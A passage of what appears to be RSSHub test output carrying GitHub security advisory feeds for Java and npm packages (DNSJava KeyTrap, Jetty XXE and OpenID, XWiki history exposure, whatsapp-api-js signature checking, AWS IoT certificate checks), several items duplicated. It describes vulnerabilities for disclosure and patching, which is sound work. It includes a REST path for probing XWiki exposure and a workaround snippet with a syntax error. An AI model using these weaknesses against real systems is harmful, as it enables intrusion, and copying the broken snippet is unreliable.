<li><a href="https://lists.apache.org/thread/3dgvzgstycf8b5hyf4z3n7cqdhcyln3l">https://lists.apache.org/thread/3dgvzgstycf8b5hyf4z3n7cqdhcyln3l</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/apache-iotdb/PYSEC-2023-7.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/apache-iotdb/PYSEC-2023-7.yaml</a></li>
<li><a href="https://github.com/advisories/GHSA-pvjv-386f-c8wh">https://github.com/advisories/GHSA-pvjv-386f-c8wh</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-pvjv-386f-c8wh</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-pvjv-386f-c8wh</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.jitsi:dnssecjava] DNSJava affected by KeyTrap - NSEC3 closest encloser proof can exhaust CPU resources</title>
<description><h3 id="impact">Impact</h3>
<p>Users using the <code>ValidatingResolver</code> for DNSSEC validation can run into CPU exhaustion with specially crafted DNSSEC-signed zones.</p>
<h3 id="patches">Patches</h3>
<p>Users should upgrade to dnsjava v3.6.0</p>
<h3 id="workarounds">Workarounds</h3>
<p>Although not recommended, only using a non-validating resolver, will remove the vulnerability.</p>
<h3 id="references">References</h3>
<p><a href="https://www.athene-center.de/en/keytrap">https://www.athene-center.de/en/keytrap</a></p>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/dnsjava/dnsjava/security/advisories/GHSA-mmwx-rj87-vfgr">https://github.com/dnsjava/dnsjava/security/advisories/GHSA-mmwx-rj87-vfgr</a></li>
<li><a href="https://github.com/dnsjava/dnsjava/commit/711af79be3214f52daa5c846b95766dc0a075116">https://github.com/dnsjava/dnsjava/commit/711af79be3214f52daa5c846b95766dc0a075116</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-50868">https://nvd.nist.gov/vuln/detail/CVE-2023-50868</a></li>
<li><a href="https://github.com/advisories/GHSA-pv4h-p8jr-6cv2">https://github.com/advisories/GHSA-pv4h-p8jr-6cv2</a></li>
<li><a href="https://github.com/advisories/GHSA-mmwx-rj87-vfgr">https://github.com/advisories/GHSA-mmwx-rj87-vfgr</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-mmwx-rj87-vfgr</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-mmwx-rj87-vfgr</guid>
<author>GitHub</author>
</item>
<item>
<title>[dnsjava:dnsjava] DNSJava affected by KeyTrap - NSEC3 closest encloser proof can exhaust CPU resources</title>
<description><h3 id="impact">Impact</h3>
<p>Users using the <code>ValidatingResolver</code> for DNSSEC validation can run into CPU exhaustion with specially crafted DNSSEC-signed zones.</p>
<h3 id="patches">Patches</h3>
<p>Users should upgrade to dnsjava v3.6.0</p>
<h3 id="workarounds">Workarounds</h3>
<p>Although not recommended, only using a non-validating resolver, will remove the vulnerability.</p>
<h3 id="references">References</h3>
<p><a href="https://www.athene-center.de/en/keytrap">https://www.athene-center.de/en/keytrap</a></p>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/dnsjava/dnsjava/security/advisories/GHSA-mmwx-rj87-vfgr">https://github.com/dnsjava/dnsjava/security/advisories/GHSA-mmwx-rj87-vfgr</a></li>
<li><a href="https://github.com/dnsjava/dnsjava/commit/711af79be3214f52daa5c846b95766dc0a075116">https://github.com/dnsjava/dnsjava/commit/711af79be3214f52daa5c846b95766dc0a075116</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-50868">https://nvd.nist.gov/vuln/detail/CVE-2023-50868</a></li>
<li><a href="https://github.com/advisories/GHSA-pv4h-p8jr-6cv2">https://github.com/advisories/GHSA-pv4h-p8jr-6cv2</a></li>
<li><a href="https://github.com/advisories/GHSA-mmwx-rj87-vfgr">https://github.com/advisories/GHSA-mmwx-rj87-vfgr</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-mmwx-rj87-vfgr</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-mmwx-rj87-vfgr</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.jitsi:dnssecjava] DNSJava vulnerable to KeyTrap - Denial-of-Service Algorithmic Complexity Attacks</title>
<description><h3 id="impact">Impact</h3>
<p>Users using the <code>ValidatingResolver</code> for DNSSEC validation can run into CPU exhaustion with specially crafted DNSSEC-signed zones.</p>
<h3 id="patches">Patches</h3>
<p>Users should upgrade to dnsjava v3.6.0</p>
<h3 id="workarounds">Workarounds</h3>
<p>Although not recommended, only using a non-validating resolver, will remove the vulnerability. </p>
<h3 id="references">References</h3>
<p><a href="https://www.athene-center.de/en/keytrap">https://www.athene-center.de/en/keytrap</a></p>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/dnsjava/dnsjava/security/advisories/GHSA-crjg-w57m-rqqf">https://github.com/dnsjava/dnsjava/security/advisories/GHSA-crjg-w57m-rqqf</a></li>
<li><a href="https://github.com/dnsjava/dnsjava/commit/07ac36a11578cc1bce0cd8ddf2fe568f062aee78">https://github.com/dnsjava/dnsjava/commit/07ac36a11578cc1bce0cd8ddf2fe568f062aee78</a></li>
<li><a href="https://github.com/dnsjava/dnsjava/commit/3ddc45ce8cdb5c2274e10b7401416f497694e1cf">https://github.com/dnsjava/dnsjava/commit/3ddc45ce8cdb5c2274e10b7401416f497694e1cf</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-50387">https://nvd.nist.gov/vuln/detail/CVE-2023-50387</a></li>
<li><a href="https://github.com/advisories/GHSA-8459-gg55-8qjj">https://github.com/advisories/GHSA-8459-gg55-8qjj</a></li>
<li><a href="https://github.com/advisories/GHSA-crjg-w57m-rqqf">https://github.com/advisories/GHSA-crjg-w57m-rqqf</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-crjg-w57m-rqqf</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-crjg-w57m-rqqf</guid>
<author>GitHub</author>
</item>
<item>
<title>[dnsjava:dnsjava] DNSJava vulnerable to KeyTrap - Denial-of-Service Algorithmic Complexity Attacks</title>
<description><h3 id="impact">Impact</h3>
<p>Users using the <code>ValidatingResolver</code> for DNSSEC validation can run into CPU exhaustion with specially crafted DNSSEC-signed zones.</p>
<h3 id="patches">Patches</h3>
<p>Users should upgrade to dnsjava v3.6.0</p>
<h3 id="workarounds">Workarounds</h3>
<p>Although not recommended, only using a non-validating resolver, will remove the vulnerability. </p>
<h3 id="references">References</h3>
<p><a href="https://www.athene-center.de/en/keytrap">https://www.athene-center.de/en/keytrap</a></p>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/dnsjava/dnsjava/security/advisories/GHSA-crjg-w57m-rqqf">https://github.com/dnsjava/dnsjava/security/advisories/GHSA-crjg-w57m-rqqf</a></li>
<li><a href="https://github.com/dnsjava/dnsjava/commit/07ac36a11578cc1bce0cd8ddf2fe568f062aee78">https://github.com/dnsjava/dnsjava/commit/07ac36a11578cc1bce0cd8ddf2fe568f062aee78</a></li>
<li><a href="https://github.com/dnsjava/dnsjava/commit/3ddc45ce8cdb5c2274e10b7401416f497694e1cf">https://github.com/dnsjava/dnsjava/commit/3ddc45ce8cdb5c2274e10b7401416f497694e1cf</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-50387">https://nvd.nist.gov/vuln/detail/CVE-2023-50387</a></li>
<li><a href="https://github.com/advisories/GHSA-8459-gg55-8qjj">https://github.com/advisories/GHSA-8459-gg55-8qjj</a></li>
<li><a href="https://github.com/advisories/GHSA-crjg-w57m-rqqf">https://github.com/advisories/GHSA-crjg-w57m-rqqf</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-crjg-w57m-rqqf</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-crjg-w57m-rqqf</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.eclipse.edc:transfer-data-plane] Eclipse Dataspace Components's ConsumerPullTransferTokenValidationApiController doesn't check for token validit</title>
<description><p>In Eclipse Dataspace Components, from version 0.5.0 and before version 0.9.0, the ConsumerPullTransferTokenValidationApiController does not check for token validity (expiry, not-before, issuance date), which can allow an attacker to bypass the check for token expiration. The issue requires to have a dataplane configured to support http proxy consumer pull AND include the module "transfer-data-plane". The affected code was marked deprecated from the version 0.6.0 in favour of Dataplane Signaling. In 0.9.0 the vulnerable code has been removed.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-8642">https://nvd.nist.gov/vuln/detail/CVE-2024-8642</a></li>
<li><a href="https://github.com/eclipse-edc/Connector/commit/04899e91dcdb4a407db4eb7af3e7b6ff9a9e9ad6">https://github.com/eclipse-edc/Connector/commit/04899e91dcdb4a407db4eb7af3e7b6ff9a9e9ad6</a></li>
<li><a href="https://github.com/eclipse-edc/Connector/releases/tag/v0.9.0">https://github.com/eclipse-edc/Connector/releases/tag/v0.9.0</a></li>
<li><a href="https://gitlab.eclipse.org/security/cve-assignement/-/issues/28">https://gitlab.eclipse.org/security/cve-assignement/-/issues/28</a></li>
<li><a href="https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/234">https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/234</a></li>
<li><a href="https://github.com/eclipse-edc/Connector/blob/bcb2e42aee82ce1863be3dcbdab29919d39a0e97/extensions/control-plane/transfer/transfer-data-plane/src/main/java/org/eclipse/edc/connector/controlplane/transfer/dataplane/api/ConsumerPullTransferTokenValidationApiController.java">https://github.com/eclipse-edc/Connector/blob/bcb2e42aee82ce1863be3dcbdab29919d39a0e97/extensions/control-plane/transfer/transfer-data-plane/src/main/java/org/eclipse/edc/connector/controlplane/transfer/dataplane/api/ConsumerPullTransferTokenValidationApiController.java</a></li>
<li><a href="https://github.com/advisories/GHSA-8259-2x72-2gvc">https://github.com/advisories/GHSA-8259-2x72-2gvc</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-8259-2x72-2gvc</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-8259-2x72-2gvc</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.glassfish.main.web:web-core] Eclipse Glassfish URL redirection vulnerability</title>
<description><p>In Eclipse Glassfish versions prior to 7.0.10, a URL redirection vulnerability to untrusted sites existed.
This vulnerability is caused by the vulnerability (CVE-2023-41080) in the Apache code included in GlassFish.
This vulnerability only affects applications that are explicitly deployed to the root context ('/').</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-8646">https://nvd.nist.gov/vuln/detail/CVE-2024-8646</a></li>
<li><a href="https://github.com/eclipse-ee4j/glassfish/pull/24655">https://github.com/eclipse-ee4j/glassfish/pull/24655</a></li>
<li><a href="https://gitlab.eclipse.org/security/cve-assignement/-/issues/34">https://gitlab.eclipse.org/security/cve-assignement/-/issues/34</a></li>
<li><a href="https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/163">https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/163</a></li>
<li><a href="https://glassfish.org/download">https://glassfish.org/download</a></li>
<li><a href="https://github.com/eclipse-ee4j/glassfish/commit/06b80012761d07f6e40e40aa6b0133465b0bd145">https://github.com/eclipse-ee4j/glassfish/commit/06b80012761d07f6e40e40aa6b0133465b0bd145</a></li>
<li><a href="https://github.com/advisories/GHSA-7gq2-vwq9-w8vw">https://github.com/advisories/GHSA-7gq2-vwq9-w8vw</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-7gq2-vwq9-w8vw</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-7gq2-vwq9-w8vw</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.keycloak:keycloak-core] Keycloak Denial of Service vulnerability</title>
<description><p>A denial of service vulnerability was found in keycloak where the amount of attributes per object is not limited,an attacker by sending repeated HTTP requests could cause a resource exhaustion when the application send back rows with long attribute values.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-6841">https://nvd.nist.gov/vuln/detail/CVE-2023-6841</a></li>
<li><a href="https://access.redhat.com/security/cve/CVE-2023-6841">https://access.redhat.com/security/cve/CVE-2023-6841</a></li>
<li><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2254714">https://bugzilla.redhat.com/show_bug.cgi?id=2254714</a></li>
<li><a href="https://github.com/advisories/GHSA-w97f-w3hq-36g2">https://github.com/advisories/GHSA-w97f-w3hq-36g2</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-w97f-w3hq-36g2</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-w97f-w3hq-36g2</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.eclipse.jetty:jetty-xml] Eclipse Jetty XmlParser allows arbitrary DOCTYPE declarations</title>
<description><h3 id="from-the-reporter">From the reporter</h3>
<blockquote>
<p><code>XmlParser</code> is vulnerable to XML external entity (XXE) vulnerability.
XmlParser is being used when parsing Jetty’s xml configuration files. An attacker might exploit
this vulnerability in order to achieve SSRF or cause a denial of service.
One possible scenario is importing a (remote) malicious WAR into a Jetty’s server, while the
WAR includes a malicious web.xml.</p>
</blockquote>
<h3 id="impact">Impact</h3>
<p>There are no circumstances in a normally deployed Jetty server where potentially hostile XML is given to the XmlParser class without the attacker already having arbitrary access to the server. I.e. in order to exploit <code>XmlParser</code> the attacker would already have the ability to deploy and execute hostile code. Specifically, Jetty has no protection against malicious web application and potentially hostile web applications should only be run on an isolated virtualisation. </p>
<p>Thus this is not considered a vulnerability of the Jetty server itself, as any such usage of the jetty XmlParser is equally vulnerable as a direct usage of the JVM supplied SAX parser. No CVE will be allocated to this advisory.</p>
<p>However, any direct usage of the <code>XmlParser</code> class by an application may be vulnerable. The impact would greatly depend on how the application uses <code>XmlParser</code>, but it could be a denial of service due to large entity expansion, or possibly the revealing local files if the XML results are accessible remotely.</p>
<h3 id="patches">Patches</h3>
<p>Ability to configure the SAXParserFactory to fit the needs of your particular XML parser implementation have been merged as part of PR #10067</p>
<h3 id="workarounds">Workarounds</h3>
<p>Don't use <code>XmlParser</code> to parse data from users.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/eclipse/jetty.project/security/advisories/GHSA-58qw-p7qm-5rvh">https://github.com/eclipse/jetty.project/security/advisories/GHSA-58qw-p7qm-5rvh</a></li>
<li><a href="https://github.com/eclipse/jetty.project/pull/10067">https://github.com/eclipse/jetty.project/pull/10067</a></li>
<li><a href="https://github.com/eclipse/jetty.project/releases/tag/jetty-10.0.16">https://github.com/eclipse/jetty.project/releases/tag/jetty-10.0.16</a></li>
<li><a href="https://github.com/eclipse/jetty.project/releases/tag/jetty-11.0.16">https://github.com/eclipse/jetty.project/releases/tag/jetty-11.0.16</a></li>
<li><a href="https://github.com/eclipse/jetty.project/releases/tag/jetty-12.0.0">https://github.com/eclipse/jetty.project/releases/tag/jetty-12.0.0</a></li>
<li><a href="https://github.com/eclipse/jetty.project/releases/tag/jetty-9.4.52.v20230823">https://github.com/eclipse/jetty.project/releases/tag/jetty-9.4.52.v20230823</a></li>
<li><a href="https://github.com/advisories/GHSA-58qw-p7qm-5rvh">https://github.com/advisories/GHSA-58qw-p7qm-5rvh</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-58qw-p7qm-5rvh</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-58qw-p7qm-5rvh</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.eclipse.jetty:jetty-openid] Jetty's OpenId Revoked authentication allows one request</title>
<description><p>If a Jetty <code>OpenIdAuthenticator</code> uses the optional nested <code>LoginService</code>, and that <code>LoginService</code> decides to revoke an already authenticated user, then the current request will still treat the user as authenticated. The authentication is then cleared from the session and subsequent requests will not be treated as authenticated. </p>
<p>So a request on a previously authenticated session could be allowed to bypass authentication after it had been rejected by the <code>LoginService</code>.</p>
<h3 id="impact">Impact</h3>
<p>This impacts usages of the jetty-openid which have configured a nested <code>LoginService</code> and where that <code>LoginService</code> will is capable of rejecting previously authenticated users.</p>
<h3 id="original-report">Original Report</h3>
<blockquote>
<p>working on a custom OpenIdAuthenticator, I discovered the following:</p>
<p><a href="https://github.com/eclipse/jetty.project/blob/jetty-10.0.14/jetty-openid/src/main/java/org/eclipse/jetty/security/openid/OpenIdAuthenticator.java#L505">https://github.com/eclipse/jetty.project/blob/jetty-10.0.14/jetty-openid/src/main/java/org/eclipse/jetty/security/openid/OpenIdAuthenticator.java#L505</a></p>
<p>In the case where the LoginService does return that the authentication has been revoked (from the validate() call on line 463), the OpenIdAuthenticator removes the authentication from the session; however the current request still proceeds as if authenticated, since it falls through to "return authentication" on line 505.</p>
<p>This is fixed by moving the line 505 (and associated debug log) inside the else block that ends on line 502, instead of outside it. Then the revocation case will run through to line 517 and will trigger a new OpenId authentication which I think is correct.</p>
<p>I think this revocation can only occur if you do attach a separate LoginService to the OpenIdLoginService, but in that case the revoked authentication will still let the next request through (and possibly more than one if they are very close to simultaneous).</p>
<p>Technically I think this is a security vulnerability, if a very minor one, so I'm sending this off-list.</p>
</blockquote>
<h3 id="patched-versions">Patched Versions</h3>
<p>Fixed in Jetty Versions:</p>
<ul>
<li>9.4.52 - fixed in PR <a href="https://github.com/eclipse/jetty.project/pull/9660">https://github.com/eclipse/jetty.project/pull/9660</a></li>
<li>10.0.16 - fixed in PR <a href="https://github.com/eclipse/jetty.project/pull/9528">https://github.com/eclipse/jetty.project/pull/9528</a></li>
<li>11.0.16 - fixed in PR <a href="https://github.com/eclipse/jetty.project/pull/9528">https://github.com/eclipse/jetty.project/pull/9528</a></li>
<li>12.0.0 - not impacted (already has fix)</li>
</ul>
<h3 id="workaround">Workaround</h3>
<p>Upgrade your version of Jetty.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/eclipse/jetty.project/pull/9528">https://github.com/eclipse/jetty.project/pull/9528</a></li>
<li><a href="https://github.com/eclipse/jetty.project/pull/9660">https://github.com/eclipse/jetty.project/pull/9660</a></li>
</ul>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/eclipse/jetty.project/security/advisories/GHSA-pwh8-58vv-vw48">https://github.com/eclipse/jetty.project/security/advisories/GHSA-pwh8-58vv-vw48</a></li>
<li><a href="https://github.com/eclipse/jetty.project/pull/9528">https://github.com/eclipse/jetty.project/pull/9528</a></li>
<li><a href="https://github.com/eclipse/jetty.project/pull/9660">https://github.com/eclipse/jetty.project/pull/9660</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-41900">https://nvd.nist.gov/vuln/detail/CVE-2023-41900</a></li>
<li><a href="https://www.debian.org/security/2023/dsa-5507">https://www.debian.org/security/2023/dsa-5507</a></li>
<li><a href="https://security.netapp.com/advisory/ntap-20231110-0004">https://security.netapp.com/advisory/ntap-20231110-0004</a></li>
<li><a href="https://github.com/advisories/GHSA-pwh8-58vv-vw48">https://github.com/advisories/GHSA-pwh8-58vv-vw48</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-pwh8-58vv-vw48</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-pwh8-58vv-vw48</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.xwiki.platform:xwiki-platform-rest-server] XWiki Platform document history including authors of any page exposed to unauthorized actors</title>
<description><h3 id="impact">Impact</h3>
<p>The REST API exposes the history of any page in XWiki of which the attacker knows the name. The exposed information includes for each modification of the page the time of the modification, the version number, the author of the modification (both username and displayed name) and the version comment. This information is exposed regardless of the rights setup, and even when the wiki is configured to be fully private.</p>
<p>On a private wiki, this can be tested by accessing <code>/xwiki/rest/wikis/xwiki/spaces/Main/pages/WebHome/history</code>, if this shows the history of the main page then the installation is vulnerable.</p>
<h3 id="patches">Patches</h3>
<p>This has been patched in XWiki 15.10.9 and XWiki 16.3.0RC1.</p>
<h3 id="workarounds">Workarounds</h3>
<p>There aren't any known workarounds apart from upgrading to a fixed version.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://jira.xwiki.org/browse/XWIKI-22052">https://jira.xwiki.org/browse/XWIKI-22052</a></li>
<li><a href="https://github.com/xwiki/xwiki-platform/commit/9cbca9808300797c67779bb9a665d85cf9e3d4b8">https://github.com/xwiki/xwiki-platform/commit/9cbca9808300797c67779bb9a665d85cf9e3d4b8</a></li>
</ul>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-pvmm-55r5-g3mm">https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-pvmm-55r5-g3mm</a></li>
<li><a href="https://github.com/xwiki/xwiki-platform/commit/26482ee5d29fc21f31134d1ee13db48716e89e0f">https://github.com/xwiki/xwiki-platform/commit/26482ee5d29fc21f31134d1ee13db48716e89e0f</a></li>
<li><a href="https://github.com/xwiki/xwiki-platform/commit/9cbca9808300797c67779bb9a665d85cf9e3d4b8">https://github.com/xwiki/xwiki-platform/commit/9cbca9808300797c67779bb9a665d85cf9e3d4b8</a></li>
<li><a href="https://jira.xwiki.org/browse/XWIKI-22052">https://jira.xwiki.org/browse/XWIKI-22052</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45591">https://nvd.nist.gov/vuln/detail/CVE-2024-45591</a></li>
<li><a href="https://github.com/advisories/GHSA-pvmm-55r5-g3mm">https://github.com/advisories/GHSA-pvmm-55r5-g3mm</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-pvmm-55r5-g3mm</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-pvmm-55r5-g3mm</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.xwiki.platform:xwiki-platform-rest-server] XWiki Platform document history including authors of any page exposed to unauthorized actors</title>
<description><h3 id="impact">Impact</h3>
<p>The REST API exposes the history of any page in XWiki of which the attacker knows the name. The exposed information includes for each modification of the page the time of the modification, the version number, the author of the modification (both username and displayed name) and the version comment. This information is exposed regardless of the rights setup, and even when the wiki is configured to be fully private.</p>
<p>On a private wiki, this can be tested by accessing <code>/xwiki/rest/wikis/xwiki/spaces/Main/pages/WebHome/history</code>, if this shows the history of the main page then the installation is vulnerable.</p>
<h3 id="patches">Patches</h3>
<p>This has been patched in XWiki 15.10.9 and XWiki 16.3.0RC1.</p>
<h3 id="workarounds">Workarounds</h3>
<p>There aren't any known workarounds apart from upgrading to a fixed version.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://jira.xwiki.org/browse/XWIKI-22052">https://jira.xwiki.org/browse/XWIKI-22052</a></li>
<li><a href="https://github.com/xwiki/xwiki-platform/commit/9cbca9808300797c67779bb9a665d85cf9e3d4b8">https://github.com/xwiki/xwiki-platform/commit/9cbca9808300797c67779bb9a665d85cf9e3d4b8</a></li>
</ul>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-pvmm-55r5-g3mm">https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-pvmm-55r5-g3mm</a></li>
<li><a href="https://github.com/xwiki/xwiki-platform/commit/26482ee5d29fc21f31134d1ee13db48716e89e0f">https://github.com/xwiki/xwiki-platform/commit/26482ee5d29fc21f31134d1ee13db48716e89e0f</a></li>
<li><a href="https://github.com/xwiki/xwiki-platform/commit/9cbca9808300797c67779bb9a665d85cf9e3d4b8">https://github.com/xwiki/xwiki-platform/commit/9cbca9808300797c67779bb9a665d85cf9e3d4b8</a></li>
<li><a href="https://jira.xwiki.org/browse/XWIKI-22052">https://jira.xwiki.org/browse/XWIKI-22052</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45591">https://nvd.nist.gov/vuln/detail/CVE-2024-45591</a></li>
<li><a href="https://github.com/advisories/GHSA-pvmm-55r5-g3mm">https://github.com/advisories/GHSA-pvmm-55r5-g3mm</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-pvmm-55r5-g3mm</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-pvmm-55r5-g3mm</guid>
<author>GitHub</author>
</item>
</channel>
</rss>... |
http://localhost:1200/github-advisor/data/npm - Success ✔️<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">
<channel>
<title>GitHub Advisory Database RSS - npm</title>
<link>https://github.com/advisories</link>
<atom:link href="http://localhost:1200/github-advisor/data/npm" rel="self" type="application/rss+xml"></atom:link>
<description>GitHub Advisory Database RSS - npm - Powered by RSSHub</description>
<generator>RSSHub</generator>
<webMaster>contact@rsshub.app (RSSHub)</webMaster>
<language>en</language>
<lastBuildDate>Fri, 13 Sep 2024 16:19:17 GMT</lastBuildDate>
<ttl>5</ttl>
<item>
<title>[whatsapp-api-js] whatsapp-api-js fails to validate message's signature</title>
<description><h3 id="impact">Impact</h3>
<p>Incorrect Access Control, anyone using the post or verifyRequestSignature methods to handle messages is impacted.</p>
<h3 id="patches">Patches</h3>
<p>Patched in version 4.0.3.</p>
<h3 id="workarounds">Workarounds</h3>
<p>It's possible to check the payload validation using the WhatsAppAPI.verifyRequestSignature and expect false when the signature is valid.</p>
<pre><code class="language-ts">function doPost(payload, header_signature) {
if (whatsapp.verifyRequestSignature(payload.toString(), header_signature) {
throw 403;
}
// Now the payload is correctly verified
whatsapp.post(payload);
}
</code></pre>
<h3 id="references">References</h3>
<p><a href="https://github.com/Secreto31126/whatsapp-api-js/pull/371">https://github.com/Secreto31126/whatsapp-api-js/pull/371</a></p>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/Secreto31126/whatsapp-api-js/security/advisories/GHSA-mwhf-vhr5-7j23">https://github.com/Secreto31126/whatsapp-api-js/security/advisories/GHSA-mwhf-vhr5-7j23</a></li>
<li><a href="https://github.com/Secreto31126/whatsapp-api-js/pull/371">https://github.com/Secreto31126/whatsapp-api-js/pull/371</a></li>
<li><a href="https://github.com/Secreto31126/whatsapp-api-js/commit/56620c65126427496a94d176082fbd8393a95b6d">https://github.com/Secreto31126/whatsapp-api-js/commit/56620c65126427496a94d176082fbd8393a95b6d</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45607">https://nvd.nist.gov/vuln/detail/CVE-2024-45607</a></li>
<li><a href="https://github.com/advisories/GHSA-mwhf-vhr5-7j23">https://github.com/advisories/GHSA-mwhf-vhr5-7j23</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-mwhf-vhr5-7j23</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-mwhf-vhr5-7j23</guid>
<author>GitHub</author>
</item>
<item>
<title>[aws-iot-device-sdk-v2] Improper certificate management in AWS IoT Device SDK v2</title>
<description><p>Connections initialized by the AWS IoT Device SDK v2 for Java (versions prior to 1.3.3), Python (versions prior to 1.5.18), C++ (versions prior to 1.12.7) and Node.js (versions prior to 1.5.1) did not verify server certificate hostname during TLS handshake when overriding Certificate Authorities (CA) in their trust stores on Windows. This issue has been addressed in aws-c-io submodule versions 0.9.13 onward. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.3.3 on Microsoft Windows. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.5.18 on Microsoft Windows. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.12.7 on Microsoft Windows. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.5.3 on Microsoft Windows.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-40828">https://nvd.nist.gov/vuln/detail/CVE-2021-40828</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2">https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2/commit/4be41394f1aee979e6f4b012fcb01eecabd0c08d">https://github.com/aws/aws-iot-device-sdk-js-v2/commit/4be41394f1aee979e6f4b012fcb01eecabd0c08d</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2/commit/fd4c0ba04b35eab9e20c635af5548fcc5a92d8be">https://github.com/aws/aws-iot-device-sdk-python-v2/commit/fd4c0ba04b35eab9e20c635af5548fcc5a92d8be</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-cpp-v2">https://github.com/aws/aws-iot-device-sdk-cpp-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2">https://github.com/aws/aws-iot-device-sdk-java-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2">https://github.com/aws/aws-iot-device-sdk-js-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2">https://github.com/aws/aws-iot-device-sdk-python-v2</a></li>
<li><a href="https://github.com/advisories/GHSA-94jq-q5v2-76wj">https://github.com/advisories/GHSA-94jq-q5v2-76wj</a></li>
<li><a href="https://github.com/awslabs/aws-c-io">https://github.com/awslabs/aws-c-io</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-861.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-861.yaml</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-94jq-q5v2-76wj</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-94jq-q5v2-76wj</guid>
<author>GitHub</author>
</item>
<item>
<title>[aws-iot-device-sdk-v2] Improper certificate management in AWS IoT Device SDK v2</title>
